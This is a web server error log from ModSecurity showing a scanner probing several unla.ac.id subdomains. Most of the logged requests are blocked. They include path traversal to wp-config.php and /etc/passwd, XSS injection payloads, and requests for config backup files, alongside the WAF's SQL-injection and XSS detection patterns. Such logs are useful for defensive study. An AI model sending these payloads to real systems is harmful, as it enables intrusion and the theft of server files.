[Tue Aug 29 11:54:40.072573 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16EMCo-f0AAApgA00AAAAH"]
[Tue Aug 29 11:54:40.186670 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_cb955ad0647d3651c348d2641017377fe3d6211a"): Internal error [hostname "journal.unla.ac.id"] [uri "/web.config.back"] [unique_id "ZO16D8Co-f0AAAoz78EAAAAS"]
[Tue Aug 29 11:54:40.312060 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_4ff59d53ecff7ab5b17c5d9254966911e5882e5e"): Internal error [hostname "www.unla.ac.id"] [uri "/<script>alert(document.domain)</script>"] [unique_id "ZO16D8Co-f0AAApk-W0AAAAn"]
[Tue Aug 29 11:54:40.314617 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_d7f9fdf39193610aaa5fc6cb072e72086210c23b"): Internal error [hostname "informatika.unla.ac.id"] [uri "/config.inc.php-sample.php"] [unique_id "ZO16D8Co-f0AAAqUB3IAAAAb"]
[Tue Aug 29 11:54:40.316605 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_4ff59d53ecff7ab5b17c5d9254966911e5882e5e"): Internal error [hostname "informatika.unla.ac.id"] [uri "/web.config.copy"] [unique_id "ZO16D8Co-f0AAApV23wAAAAJ"]
[Tue Aug 29 11:54:40.317529 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_1eea905f7d282aa5957c78190e760de321c2b972"): Internal error [hostname "journal.unla.ac.id"] [uri "/config.inc.php-good"] [unique_id "ZO16D8Co-f0AAApa-FcAAAAg"]
[Tue Aug 29 11:54:40.529638 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAApbUVwAAAAh"]
[Tue Aug 29 11:54:40.540592 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAoz78MAAAAS"]
[Tue Aug 29 11:54:40.541473 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAqTvkUAAAAa"]
[Tue Aug 29 11:54:40.547718 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAofnFUAAAAX"]
[Tue Aug 29 11:54:40.550215 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAqeFPkAAAAx"]
[Tue Aug 29 11:54:41.553250 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAqQ@u0AAAAB"]
[Tue Aug 29 11:54:41.572976 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAAqTvkgAAAAa"]
[Tue Aug 29 11:54:41.573630 2023] [:error] [pid 2713] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAqZuacAAAAs"]
[Tue Aug 29 11:54:41.575153 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAAqWwXkAAAAl"]
[Tue Aug 29 11:54:41.599449 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAqTvkkAAAAa"]
[Tue Aug 29 11:54:41.599775 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EcCo-f0AAAqhN8oAAAAE"]
[Tue Aug 29 11:54:41.609169 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAqY56gAAAAr"]
[Tue Aug 29 11:54:41.630236 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAqWwXsAAAAl"]
[Tue Aug 29 11:54:41.630795 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAApgA1EAAAAH"]
[Tue Aug 29 11:54:41.635677 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAApk-XUAAAAn"]
[Tue Aug 29 11:54:41.640126 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAAqY56kAAAAr"]
[Tue Aug 29 11:54:42.581456 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EsCo-f0AAAqdbnIAAAAw"]
[Tue Aug 29 11:54:42.591056 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EsCo-f0AAAqWwXwAAAAl"]
[Tue Aug 29 11:54:44.577391 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonfocus\\\\b\\\\W*?\\\\=" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "124"] [id "958409"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onfocus= found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqTvlEAAAAa"]
[Tue Aug 29 11:54:44.580575 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqWwYUAAAAl"]
[Tue Aug 29 11:54:44.583104 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonfocus\\\\b\\\\W*?\\\\=" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "124"] [id "958409"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onfocus= found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqUB3oAAAAb"]
[Tue Aug 29 11:54:44.584107 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonfocus\\\\b\\\\W*?\\\\=" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "124"] [id "958409"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onfocus= found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqdbnoAAAAw"]
[Tue Aug 29 11:54:44.624018 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAApV24kAAAAJ"]
[Tue Aug 29 11:54:45.650127 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonfocus\\\\b\\\\W*?\\\\=" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "124"] [id "958409"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onfocus= found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FcCo-f0AAApHRZEAAAAP"]
[Tue Aug 29 11:54:46.600130 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqdboAAAAAw"]
[Tue Aug 29 11:54:46.637029 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqQ@v0AAAAB"]
